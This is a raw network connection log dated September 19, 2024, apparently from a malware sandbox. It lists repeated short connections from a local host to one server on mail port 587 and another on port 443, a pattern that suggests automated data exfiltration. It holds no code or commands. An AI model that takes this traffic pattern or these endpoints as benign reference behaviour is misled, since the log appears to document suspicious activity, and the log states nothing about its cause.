                                                                          Sep 19, 2024 12:23:42.744224072 CEST61629587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:43.418534994 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:43.418764114 CEST61629587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:43.423690081 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:43.577435970 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:43.577665091 CEST61629587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:43.582539082 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:43.739062071 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:43.739300013 CEST61629587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:43.744122028 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:44.815325022 CEST58761627208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:44.815500021 CEST61627587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:44.815594912 CEST58761627208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:44.819210052 CEST61627587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:44.820393085 CEST58761627208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:44.975677967 CEST58761627208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:44.980225086 CEST61627587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:44.985032082 CEST58761627208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:45.157860994 CEST58761627208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:45.158163071 CEST61627587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:45.160888910 CEST61630443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:45.160936117 CEST44361630149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:45.160993099 CEST61630443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:45.161317110 CEST61630443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:45.161330938 CEST44361630149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:45.163372040 CEST58761627208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:45.163417101 CEST61627587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:45.466655970 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:45.466823101 CEST61629587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:45.471623898 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:45.627495050 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:45.627643108 CEST61629587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:45.632553101 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:45.779208899 CEST44361630149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:45.781431913 CEST61630443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:45.781486988 CEST44361630149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:45.781555891 CEST61630443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:45.781578064 CEST44361630149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:45.803284883 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:45.803541899 CEST61629587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:45.806905031 CEST61631443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:45.806950092 CEST44361631149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:45.807029963 CEST61631443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:45.807343960 CEST61631443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:45.807358980 CEST44361631149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:45.808856010 CEST58761629208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:45.808912039 CEST61629587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:46.117634058 CEST44361630149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:46.117818117 CEST44361630149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:46.118304014 CEST61630443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:46.118928909 CEST61630443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:46.122458935 CEST61632587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:46.127271891 CEST58761632208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:46.130800962 CEST61632587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:46.415543079 CEST44361631149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:46.417416096 CEST61631443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:46.417448997 CEST44361631149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:46.417751074 CEST61631443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:46.417757034 CEST44361631149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:46.684505939 CEST58761632208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:46.684768915 CEST61632587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:46.689898014 CEST58761632208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:46.736778021 CEST44361631149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:46.736895084 CEST44361631149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:46.737081051 CEST61631443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:46.738419056 CEST61631443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:46.738426924 CEST61633587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:46.747009993 CEST58761633208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:46.747306108 CEST61633587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:46.841156006 CEST58761632208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:46.842761040 CEST61632587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:46.848683119 CEST58761632208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:47.294374943 CEST58761633208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:47.294504881 CEST61633587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:47.299624920 CEST58761633208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:47.452532053 CEST58761633208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:47.452779055 CEST61633587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:47.457662106 CEST58761633208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:47.610874891 CEST58761633208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:47.611074924 CEST61633587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:47.615974903 CEST58761633208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:47.791496992 CEST61633587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:47.794755936 CEST61634443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:47.794811010 CEST44361634149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:47.794872046 CEST61634443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:47.795137882 CEST61634443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:47.795155048 CEST44361634149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:47.796679974 CEST58761633208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:47.796725035 CEST61633587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:49.239495039 CEST44361634149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:49.241617918 CEST61634443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.241672993 CEST44361634149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:49.241717100 CEST61634443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.241728067 CEST44361634149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:49.558322906 CEST44361634149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:49.558439016 CEST44361634149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:49.558516026 CEST61634443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.558984995 CEST61634443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.560868979 CEST61635587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:49.565649986 CEST58761635208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:49.565713882 CEST61635587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:49.650942087 CEST61632587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:49.654422045 CEST61636443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.654470921 CEST44361636149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:49.654527903 CEST61636443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.654827118 CEST61636443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.654841900 CEST44361636149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:49.656095982 CEST58761632208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:49.656148911 CEST61632587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:49.713430882 CEST61635587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:49.716439009 CEST61637443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.716536999 CEST44361637149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:49.716614962 CEST61637443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.716875076 CEST61637443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:49.716917038 CEST44361637149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:49.718322992 CEST58761635208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:49.718360901 CEST61635587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:50.274398088 CEST44361636149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.278521061 CEST61636443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:50.278542042 CEST44361636149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.278749943 CEST61636443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:50.278755903 CEST44361636149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.353425026 CEST44361637149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.355778933 CEST61637443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:50.355844975 CEST44361637149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.356698990 CEST61637443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:50.356720924 CEST44361637149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.599792957 CEST44361636149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.599992037 CEST44361636149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.600167990 CEST61636443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:50.600509882 CEST61636443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:50.604260921 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:50.609080076 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:50.612364054 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:50.656160116 CEST44361637149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.656232119 CEST44361637149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:50.660540104 CEST61637443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:50.660761118 CEST61637443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:50.664263010 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:50.669091940 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:50.669589996 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:51.158401966 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.158540964 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:51.168329954 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.246782064 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.246927977 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:51.252908945 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.319607973 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.320455074 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:51.326167107 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.408229113 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.408404112 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:51.413183928 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.477423906 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.477699995 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:51.482604980 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.571041107 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:51.571269989 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:51.576072931 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:53.470848083 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:53.471021891 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:53.476866961 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:53.525876045 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:53.525986910 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:53.530859947 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:53.635034084 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:53.635298967 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:53.640412092 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:53.864763975 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:53.864907026 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:53.865803003 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:53.866014957 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:53.869293928 CEST61640443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:53.869327068 CEST44361640149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:53.869432926 CEST61640443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:53.869725943 CEST61640443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:53.869735003 CEST44361640149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.047863960 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:54.047924042 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:54.048151970 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:54.048214912 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:54.049463034 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:54.050386906 CEST58761639208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:54.050442934 CEST61639587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:54.218976021 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:54.219254971 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:54.224212885 CEST58761638208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:54.224256992 CEST61641443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:54.224299908 CEST44361641149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.224333048 CEST61638587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:54.227555990 CEST61641443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:54.227555990 CEST61641443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:54.227586985 CEST44361641149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.660305977 CEST44361640149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.664745092 CEST61640443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:54.664757967 CEST44361640149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.664990902 CEST61640443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:54.664997101 CEST44361640149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.899277925 CEST44361641149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.908263922 CEST61641443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:54.908291101 CEST44361641149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.911660910 CEST61641443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:54.911668062 CEST44361641149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.970920086 CEST44361640149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.971117020 CEST44361640149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:54.971842051 CEST61640443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:54.971842051 CEST61640443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:54.974328995 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:54.979190111 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:54.983278990 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:55.274707079 CEST44361641149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:55.274771929 CEST44361641149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:55.274818897 CEST61641443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:55.275373936 CEST61641443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:55.276830912 CEST61643587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:55.282313108 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:55.282368898 CEST61643587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:55.532394886 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:55.532547951 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:55.538500071 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:55.687222958 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:55.687401056 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:55.695169926 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:55.845078945 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:55.845366001 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:55.850147963 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:55.859055042 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:55.859282017 CEST61643587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:55.864130974 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:56.019311905 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:56.019567013 CEST61643587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:56.024389982 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:56.192042112 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:56.196293116 CEST61643587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:56.201129913 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.184030056 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.186950922 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:58.187799931 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.190340996 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:58.192810059 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.346004963 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.346237898 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:58.351100922 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.360615969 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.361329079 CEST61643587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:58.366080046 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.518626928 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.519229889 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:58.523624897 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.524272919 CEST61643587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:58.524468899 CEST58761642208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.526071072 CEST61642587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:58.529464960 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.536710978 CEST61644443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:58.536766052 CEST44361644149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:58.537189960 CEST61644443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:58.537189960 CEST61644443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:58.537229061 CEST44361644149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:58.704483032 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.710923910 CEST61645443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:58.710927963 CEST61643587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:58.710999966 CEST44361645149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:58.711357117 CEST61645443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:58.711358070 CEST61645443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:58.711447954 CEST44361645149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:58.715954065 CEST58761643208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:58.720273018 CEST61643587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:59.156359911 CEST44361644149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.158199072 CEST61644443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:59.158274889 CEST44361644149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.158334970 CEST61644443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:59.158358097 CEST44361644149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.348571062 CEST44361645149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.350904942 CEST61645443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:59.350967884 CEST44361645149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.351038933 CEST61645443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:59.351058960 CEST44361645149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.470107079 CEST44361644149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.470213890 CEST44361644149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.470280886 CEST61644443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:59.470789909 CEST61644443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:59.472227097 CEST61646587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:59.477163076 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:59.477236986 CEST61646587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:59.648921013 CEST44361645149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.648983955 CEST44361645149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:23:59.649051905 CEST61645443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:59.649491072 CEST61645443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:23:59.650911093 CEST61647587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:23:59.659365892 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:23:59.659429073 CEST61647587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:00.045005083 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.045279026 CEST61646587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:00.050273895 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.208137035 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.213181019 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.213299036 CEST61646587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:00.218782902 CEST61647587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:00.221344948 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.225068092 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.373162031 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.375402927 CEST61647587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:00.378757954 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.379089117 CEST61646587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:00.381534100 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.385005951 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.532694101 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:00.533298016 CEST61647587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:00.538520098 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.529666901 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.530534029 CEST61647587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:02.533288956 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.534852982 CEST61646587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:02.535295010 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.539710999 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.685805082 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.687134981 CEST61647587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:02.693471909 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.694431067 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.694785118 CEST61646587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:02.699889898 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.967334032 CEST58761647208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.968831062 CEST58761646208.91.198.143192.168.2.5
                                                                          Sep 19, 2024 12:24:02.970474958 CEST61647587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:02.970598936 CEST61646587192.168.2.5208.91.198.143
                                                                          Sep 19, 2024 12:24:02.973014116 CEST61649443192.168.2.5149.154.167.220
